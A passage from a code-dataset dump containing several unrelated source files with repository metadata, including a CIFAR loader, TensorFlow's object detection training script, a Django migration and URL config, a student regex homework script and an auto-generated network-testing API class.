['data_batch_2', 'd4bba439e000b95fd0a9bffe97cbabec'],
['data_batch_3', '54ebc095f3ab1f0389bbae665268c751'],
['data_batch_4', '634d18415352ddfa80567beed471001a'],
['data_batch_5', '482c414d41f54cd18b22e5b47cb7c3cb'],
]
test_list = [
['test_batch', '40351d587109b95175f43aff81a1287e'],
]
def __init__(self, root, train=True,
transform=None, target_transform=None,
query_num=1000):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
# if download:
# self.download()
# if not self._check_integrity():
# raise RuntimeError('Dataset not found or corrupted.' +
# ' You can use download=True to download it')
# now load the picked numpy arrays
if self.train:
self.train_data = []
self.train_labels = []
for fentry in self.train_list:
f = fentry[0]
file = os.path.join(self.root, self.base_folder, f)
fo = open(file, 'rb')
if sys.version_info[0] == 2:
entry = pickle.load(fo)
else:
entry = pickle.load(fo, encoding='latin1')
self.train_data.append(entry['data'])
if 'labels' in entry:
self.train_labels += entry['labels']
else:
self.train_labels += entry['fine_labels']
fo.close()
self.train_data = np.concatenate(self.train_data)
self.train_data = self.train_data.reshape((50000, 3, 32, 32))
self.train_data = self.train_data.transpose((0, 2, 3, 1)) # convert to HWC
else:
f = self.test_list[0][0]
file = os.path.join(self.root, self.base_folder, f)
fo = open(file, 'rb')
if sys.version_info[0] == 2:
entry = pickle.load(fo)
else:
entry = pickle.load(fo, encoding='latin1')
self.test_data = entry['data']
if 'labels' in entry:
self.test_labels = entry['labels']
else:
self.test_labels = entry['fine_labels']
fo.close()
self.test_data = self.test_data.reshape((10000, 3, 32, 32))
self.test_data = self.test_data.transpose((0, 2, 3, 1)) # convert to HWC
perm = np.arange(10000)
random.shuffle(perm)
self.query_index = perm[:query_num]
self.base_index = perm[query_num:]
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.train:
img, target = self.train_data[index], self.train_labels[index]
else:
img, target = self.test_data[self.query_index[index]], self.test_labels[self.query_index[index]]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
if self.train:
return len(self.train_data)
else:
return len(self.query_index)
# def _check_integrity(self):
# root = self.root
# for fentry in (self.train_list + self.test_list):
# filename, md5 = fentry[0], fentry[1]
# fpath = os.path.join(root, self.base_folder, filename)
# if not check_integrity(fpath, md5):
# return False
# return True
# def download(self):
# import tarfile
#
# if self._check_integrity():
# print('Files already downloaded and verified')
# return
#
# root = self.root
# download_url(self.url, root, self.filename, self.tgz_md5)
#
# # extract file
# cwd = os.getcwd()
# tar = tarfile.open(os.path.join(root, self.filename), "r:gz")
# os.chdir(root)
# tar.extractall()
# tar.close()
# os.chdir(cwd)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = 'train' if self.train is True else 'test'
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
|
[
"2622786022@qq.com"
] |
2622786022@qq.com
|
cfb27aa31eff40e7e67b086f392c63700528a5a7
|
dd12e0765060a05ab0a824f46177732e8dd7ca39
|
/models/research/object_detection/train.py
|
d36a1e8a8a99904262489eeeff66906feab65856
|
[
"Apache-2.0"
] |
permissive
|
jsqiaoliang/w9-github
|
828e24c931ae545297ea9ab21931bfdbca188580
|
af35993a0884ce1b78f73c1a307911e9d8f53dad
|
refs/heads/master
| 2022-11-11T04:37:05.382092
| 2018-06-30T00:49:01
| 2018-06-30T00:49:01
| 139,206,271
| 0
| 1
| null | 2022-10-22T13:05:19
| 2018-06-30T00:07:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,812
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training executable for detection models.
This executable is used to train DetectionModels. There are two ways of
configuring the training job:
1) A single pipeline_pb2.TrainEvalPipelineConfig configuration file
can be specified by --pipeline_config_path.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--pipeline_config_path=pipeline_config.pbtxt
2) Three configuration files can be provided: a model_pb2.DetectionModel
configuration file to define what type of DetectionModel is being trained, an
input_reader_pb2.InputReader file to specify what training data will be used and
a train_pb2.TrainConfig file to configure training parameters.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--model_config_path=model_config.pbtxt \
--train_config_path=train_config.pbtxt \
--input_config_path=train_input_config.pbtxt
"""
import functools
import json
import os
import tensorflow as tf
from object_detection import trainer
from object_detection.builders import dataset_builder
from object_detection.builders import graph_rewriter_builder
from object_detection.builders import model_builder
from object_detection.utils import config_util
from object_detection.utils import dataset_util
tf.logging.set_verbosity(tf.logging.INFO)
flags = tf.app.flags
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('num_clones', 1, 'Number of clones to deploy per worker.')
flags.DEFINE_boolean('clone_on_cpu', False,
'Force clones to be deployed on CPU. Note that even if '
'set to False (allowing ops to run on gpu), some ops may '
'still be run on the CPU if they have no GPU kernel.')
flags.DEFINE_integer('worker_replicas', 1, 'Number of worker+trainer '
'replicas.')
flags.DEFINE_integer('ps_tasks', 0,
'Number of parameter server tasks. If None, does not use '
'a parameter server.')
flags.DEFINE_string('train_dir', '',
'Directory to save the checkpoints and training summaries.')
flags.DEFINE_string('pipeline_config_path', '',
'Path to a pipeline_pb2.TrainEvalPipelineConfig config '
'file. If provided, other configs are ignored')
print(flags.DEFINE_string)
flags.DEFINE_string('train_config_path', '',
'Path to a train_pb2.TrainConfig config file.')
flags.DEFINE_string('input_config_path', '',
'Path to an input_reader_pb2.InputReader config file.')
flags.DEFINE_string('model_config_path', '',
'Path to a model_pb2.DetectionModel config file.')
FLAGS = flags.FLAGS
def main(_):
assert FLAGS.train_dir, '`train_dir` is missing.'
if FLAGS.task == 0: tf.gfile.MakeDirs(FLAGS.train_dir)
if FLAGS.pipeline_config_path:
configs = config_util.get_configs_from_pipeline_file(
FLAGS.pipeline_config_path)
if FLAGS.task == 0:
tf.gfile.Copy(FLAGS.pipeline_config_path,
os.path.join(FLAGS.train_dir, 'pipeline.config'),
overwrite=True)
else:
configs = config_util.get_configs_from_multiple_files(
model_config_path=FLAGS.model_config_path,
train_config_path=FLAGS.train_config_path,
train_input_config_path=FLAGS.input_config_path)
if FLAGS.task == 0:
for name, config in [('model.config', FLAGS.model_config_path),
('train.config', FLAGS.train_config_path),
('input.config', FLAGS.input_config_path)]:
tf.gfile.Copy(config, os.path.join(FLAGS.train_dir, name),
overwrite=True)
model_config = configs['model']
train_config = configs['train_config']
input_config = configs['train_input_config']
model_fn = functools.partial(
model_builder.build,
model_config=model_config,
is_training=True)
def get_next(config):
return dataset_util.make_initializable_iterator(
dataset_builder.build(config)).get_next()
create_input_dict_fn = functools.partial(get_next, input_config)
env = json.loads(os.environ.get('TF_CONFIG', '{}'))
cluster_data = env.get('cluster', None)
cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
task_data = env.get('task', None) or {'type': 'master', 'index': 0}
task_info = type('TaskSpec', (object,), task_data)
# Parameters for a single worker.
ps_tasks = 0
worker_replicas = 1
worker_job_name = 'lonely_worker'
task = 0
is_chief = True
master = ''
if cluster_data and 'worker' in cluster_data:
# Number of total worker replicas include "worker"s and the "master".
worker_replicas = len(cluster_data['worker']) + 1
if cluster_data and 'ps' in cluster_data:
ps_tasks = len(cluster_data['ps'])
if worker_replicas > 1 and ps_tasks < 1:
raise ValueError('At least 1 ps task is needed for distributed training.')
if worker_replicas >= 1 and ps_tasks > 0:
# Set up distributed training.
server = tf.train.Server(tf.train.ClusterSpec(cluster), protocol='grpc',
job_name=task_info.type,
task_index=task_info.index)
if task_info.type == 'ps':
server.join()
return
worker_job_name = '%s/task:%d' % (task_info.type, task_info.index)
task = task_info.index
is_chief = (task_info.type == 'master')
master = server.target
graph_rewriter_fn = None
if 'graph_rewriter_config' in configs:
graph_rewriter_fn = graph_rewriter_builder.build(
configs['graph_rewriter_config'], is_training=True)
trainer.train(
create_input_dict_fn,
model_fn,
train_config,
master,
task,
FLAGS.num_clones,
worker_replicas,
FLAGS.clone_on_cpu,
ps_tasks,
worker_job_name,
is_chief,
FLAGS.train_dir,
graph_hook_fn=graph_rewriter_fn)
if __name__ == '__main__':
tf.app.run()
|
[
"809402755@qq.com"
] |
809402755@qq.com
|
4eebb4950c40548137f7a1e945c05bc727b4d459
|
9de6d807ee4569f8829ee77135dfdab0edfb52f0
|
/contenidos/migrations/0016_auto__add_field_libro_editorial__add_field_libro_tipo__add_field_libro.py
|
b4aedad1aaf553fdb78f07925547cc5c0ec6d5a0
|
[] |
no_license
|
dev-fjn/Fundacion
|
2d21155c74adc0a9049941c0796311bf407b07b1
|
f9053c09fbfd607273e44e4688bdb7302134f3f0
|
HEAD
| 2016-09-16T11:53:48.960224
| 2014-06-17T16:14:29
| 2014-06-17T16:14:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,136
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Libro.editorial'
db.add_column(u'contenidos_libro', 'editorial',
self.gf('django.db.models.fields.CharField')(default='(Escribir editorial)', max_length=250),
keep_default=False)
# Adding field 'Libro.tipo'
db.add_column(u'contenidos_libro', 'tipo',
self.gf('django.db.models.fields.CharField')(default='Libro', max_length=40),
keep_default=False)
# Adding field 'Libro.pais'
db.add_column(u'contenidos_libro', 'pais',
self.gf('django.db.models.fields.CharField')(default=u'Espa\xc3\xb1a', max_length=40),
keep_default=False)
# Changing field 'Libro.miniatura'
db.alter_column(u'contenidos_libro', 'miniatura', self.gf('filebrowser.fields.FileBrowseField')(max_length=200, null=True))
def backwards(self, orm):
# Deleting field 'Libro.editorial'
db.delete_column(u'contenidos_libro', 'editorial')
# Deleting field 'Libro.tipo'
db.delete_column(u'contenidos_libro', 'tipo')
# Deleting field 'Libro.pais'
db.delete_column(u'contenidos_libro', 'pais')
# User chose to not deal with backwards NULL issues for 'Libro.miniatura'
raise RuntimeError("Cannot reverse this migration. 'Libro.miniatura' and its values cannot be restored.")
# The following code is provided here to aid in writing a correct migration
# Changing field 'Libro.miniatura'
db.alter_column(u'contenidos_libro', 'miniatura', self.gf('django.db.models.fields.files.ImageField')(max_length=100))
models = {
u'contenidos.audioadjunto': {
'Meta': {'object_name': 'AudioAdjunto'},
'audio': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.documento': {
'Meta': {'object_name': 'Documento'},
'descripcion': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tipo': ('django.db.models.fields.IntegerField', [], {}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.evento': {
'Meta': {'object_name': 'Evento'},
'fecha_y_lugar': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imagen': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'pdf': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'resumen': ('django.db.models.fields.TextField', [], {}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.fechaevento': {
'Meta': {'object_name': 'FechaEvento'},
'evento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Evento']"}),
'fecha': ('django.db.models.fields.DateField', [], {}),
'hora_final': ('django.db.models.fields.TimeField', [], {}),
'hora_inicio': ('django.db.models.fields.TimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contenidos.imagen': {
'Meta': {'ordering': "('orden',)", 'object_name': 'Imagen'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imagen': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200'}),
'orden': ('django.db.models.fields.IntegerField', [], {'default': '20'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'titulo_en': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'titulo_es': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
u'contenidos.libro': {
'Meta': {'object_name': 'Libro'},
'autor': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'editorial': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'fecha': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isbn': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'miniatura': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'pais': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'precio': ('django.db.models.fields.FloatField', [], {}),
'resumen': ('django.db.models.fields.TextField', [], {}),
'tipo': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'contenidos.pdfadjunto': {
'Meta': {'object_name': 'PdfAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pdf': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.urladjunto': {
'Meta': {'object_name': 'UrlAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'contenidos.video': {
'Meta': {'object_name': 'Video'},
'flv': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mp4': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'titulo_en': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'titulo_es': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
u'contenidos.videoadjunto': {
'Meta': {'object_name': 'VideoAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'video': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['contenidos']
|
[
"fjn_dev@fundacionjuannegrin.com"
] |
fjn_dev@fundacionjuannegrin.com
|
cfccf2f5b9e4e5cf01fe4e18d2ba20b35a0ecfb3
|
8d3235b0a7212c9089667c8858026996d7349e1f
|
/Test2/work.py
|
d64e7a620677b10287bed95d07774c1ec2640441
|
[] |
no_license
|
kategavrishina/homework4prog
|
7c5c129b0c35854ef29b6d1359e24da5435c7f87
|
0182f91f77c317392e7a9deaf5bd802f380f95f0
|
refs/heads/master
| 2018-09-06T13:50:19.952523
| 2018-06-19T09:34:57
| 2018-06-19T09:34:57
| 103,937,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,181
|
py
|
#ะะฐัะธะฐะฝั 1
import re
import collections
def first(filename):
lines = 0
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
text = re.sub('<text>.+?', ' ', text)
for line in text:
lines += 1
with open('result.txt', 'w', encoding = 'utf-8') as g:
g.write(lines)
def second(filename):
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
a = re.findall('<w lemma=".+?" type="(.+?)">', text)
d = collections.Counter()
for word in a:
d[word] += 1
# ะฝะต ะทะฝะฐั, ะบะฐะบ ะทะฐะฟะธัะฐัั ัะปะพะฒะฐัั ะฒ ัะฐะนะป, ัะฐะบ ััะพ ะฟัะพััะพ ะฟัะธะฝั
print(dict(d))
def third(filename):
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
a = re.findall('type="f.h.+?">(.+?)</w>', text)
a = ', '.join(a)
with open('result.txt', 'a', encoding = 'utf-8') as h:
h.write(a)
def main():
return first('razm.xml'), second('razm.xml'), third('razm.xml')
if __name__=='__main__':
main()
|
[
"noreply@github.com"
] |
kategavrishina.noreply@github.com
|
87c54eb66d5d84191cb938250febc8f6e93c66bd
|
1c6283303ceb883add8de4ee07c5ffcfc2e93fab
|
/Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/writeactions_b6ffad884e16fd072bdbe0c697cc514e.py
|
bebad5f05592157f45ad6a78e307f0ca57195d62
|
[] |
no_license
|
pdobrinskiy/devcore
|
0f5b3dfc2f3bf1e44abd716f008a01c443e14f18
|
580c7df6f5db8c118990cf01bc2b986285b9718b
|
refs/heads/main
| 2023-07-29T20:28:49.035475
| 2021-09-14T10:02:16
| 2021-09-14T10:02:16
| 405,919,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,181
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class WriteActions(Base):
"""If selected, Write Actions instruction is supported.
The WriteActions class encapsulates a required writeActions resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'writeActions'
_SDM_ATT_MAP = {
'CopyTtlIn': 'copyTtlIn',
'CopyTtlOut': 'copyTtlOut',
'DecrementMplsTtl': 'decrementMplsTtl',
'DecrementNetworkTtl': 'decrementNetworkTtl',
'Group': 'group',
'Output': 'output',
'PopMpls': 'popMpls',
'PopPbb': 'popPbb',
'PopVlan': 'popVlan',
'PushMpls': 'pushMpls',
'PushPbb': 'pushPbb',
'PushVlan': 'pushVlan',
'SetField': 'setField',
'SetMplsTtl': 'setMplsTtl',
'SetNetworkTtl': 'setNetworkTtl',
'SetQueue': 'setQueue',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(WriteActions, self).__init__(parent, list_op)
@property
def CopyTtlIn(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Copy TTL In Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['CopyTtlIn'])
@CopyTtlIn.setter
def CopyTtlIn(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['CopyTtlIn'], value)
@property
def CopyTtlOut(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Copy TTL Out Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['CopyTtlOut'])
@CopyTtlOut.setter
def CopyTtlOut(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['CopyTtlOut'], value)
@property
def DecrementMplsTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Decrement MPLS TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['DecrementMplsTtl'])
@DecrementMplsTtl.setter
def DecrementMplsTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['DecrementMplsTtl'], value)
@property
def DecrementNetworkTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Decrement Network TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['DecrementNetworkTtl'])
@DecrementNetworkTtl.setter
def DecrementNetworkTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['DecrementNetworkTtl'], value)
@property
def Group(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Group Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['Group'])
@Group.setter
def Group(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Group'], value)
@property
def Output(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Output Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['Output'])
@Output.setter
def Output(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Output'], value)
@property
def PopMpls(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop MPLS Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopMpls'])
@PopMpls.setter
def PopMpls(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopMpls'], value)
@property
def PopPbb(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop PBB Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopPbb'])
@PopPbb.setter
def PopPbb(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopPbb'], value)
@property
def PopVlan(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop VLAN Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopVlan'])
@PopVlan.setter
def PopVlan(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopVlan'], value)
@property
def PushMpls(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push MPLS Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushMpls'])
@PushMpls.setter
def PushMpls(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushMpls'], value)
@property
def PushPbb(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push PBB Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushPbb'])
@PushPbb.setter
def PushPbb(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushPbb'], value)
@property
def PushVlan(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push VLAN Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushVlan'])
@PushVlan.setter
def PushVlan(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushVlan'], value)
@property
def SetField(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Field Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetField'])
@SetField.setter
def SetField(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetField'], value)
@property
def SetMplsTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set MPLS TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetMplsTtl'])
@SetMplsTtl.setter
def SetMplsTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetMplsTtl'], value)
@property
def SetNetworkTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Network TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetNetworkTtl'])
@SetNetworkTtl.setter
def SetNetworkTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetNetworkTtl'], value)
@property
def SetQueue(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Queue Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetQueue'])
@SetQueue.setter
def SetQueue(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetQueue'], value)
def update(self, CopyTtlIn=None, CopyTtlOut=None, DecrementMplsTtl=None, DecrementNetworkTtl=None, Group=None, Output=None, PopMpls=None, PopPbb=None, PopVlan=None, PushMpls=None, PushPbb=None, PushVlan=None, SetField=None, SetMplsTtl=None, SetNetworkTtl=None, SetQueue=None):
# type: (bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool) -> WriteActions
"""Updates writeActions resource on the server.
Args
----
- CopyTtlIn (bool): If selected, table supports Copy TTL In Write Actions.
- CopyTtlOut (bool): If selected, table supports Copy TTL Out Write Actions.
- DecrementMplsTtl (bool): If selected, table supports Decrement MPLS TTL Write Actions.
- DecrementNetworkTtl (bool): If selected, table supports Decrement Network TTL Write Actions.
- Group (bool): If selected, table supports Group Write Actions.
- Output (bool): If selected, table supports Output Write Actions.
- PopMpls (bool): If selected, table supports Pop MPLS Write Actions.
- PopPbb (bool): If selected, table supports Pop PBB Write Actions.
- PopVlan (bool): If selected, table supports Pop VLAN Write Actions.
- PushMpls (bool): If selected, table supports Push MPLS Write Actions.
- PushPbb (bool): If selected, table supports Push PBB Write Actions.
- PushVlan (bool): If selected, table supports Push VLAN Write Actions.
- SetField (bool): If selected, table supports Set Field Write Actions.
- SetMplsTtl (bool): If selected, table supports Set MPLS TTL Write Actions.
- SetNetworkTtl (bool): If selected, table supports Set Network TTL Write Actions.
- SetQueue (bool): If selected, table supports Set Queue Write Actions.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
|
[
"pdobrinskiy@yahoo.com"
] |
pdobrinskiy@yahoo.com
|
280852c62724590eb29ecc92644759f667191119
|
ef63608c4aad9b5e9f0cbbc189483904c0b26167
|
/users/urls.py
|
038af218d1ce0def8823257b687b78cc822f74be
|
[] |
no_license
|
wgrn/authentication
|
98e1226cc44ac71702063d501359b7881aeebe74
|
0f0251d7056dec5a446ecc319ae69173ab2afaaa
|
refs/heads/master
| 2020-08-03T13:49:32.766743
| 2019-10-04T05:51:58
| 2019-10-04T05:51:58
| 211,773,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
from django.urls import path
#from django.conf.urls import patterns, url
from . import views
urlpatterns = [
path("", views.index, name="index"),
path("login", views.login_view, name="login"),
path("signup", views.signup_view, name="signup"),
path("logout", views.logout_view, name="logout"),
path("contact/<int:contact_id>/", views.contact_view, name="contact"),
path("delete/<int:contact_id>/", views.delete_view, name="delete") #/<int:id>/
]
|
[
"noreply@github.com"
] |
wgrn.noreply@github.com
|
5d6f9a66f1c3e02ba109c5b2a1e9d46eae5df09a
|
a871a6dcd54567815182a9176d9311cccd329d17
|
/venv/bin/pip3
|
e487e050a47e49427607455d3dc385b3686bb835
|
[] |
no_license
|
alearcyber/riskofspeed
|
4cb4638ebd170505b9ac739268b0e702fda0051b
|
8840c7486ef27734e3d27a4ab697f292bc0003ca
|
refs/heads/main
| 2023-04-15T18:41:26.786197
| 2021-05-05T04:54:22
| 2021-05-05T04:54:22
| 364,078,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
#!/Users/aidanlear/PycharmProjects/djangoProject/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"atl9004@g.rit.edu"
] |
atl9004@g.rit.edu
|
|
40d1051a115a6157fa99c3dbd88b6ef79e788c1b
|
b8dd380b0059fdb23acdebdac61c2a6d6966148d
|
/4_dfs.py
|
7ef6771159bce2f8c49e526ada16471d6d4cb0be
|
[] |
no_license
|
mahesh-keswani/data_structures_algorithms_important_problems
|
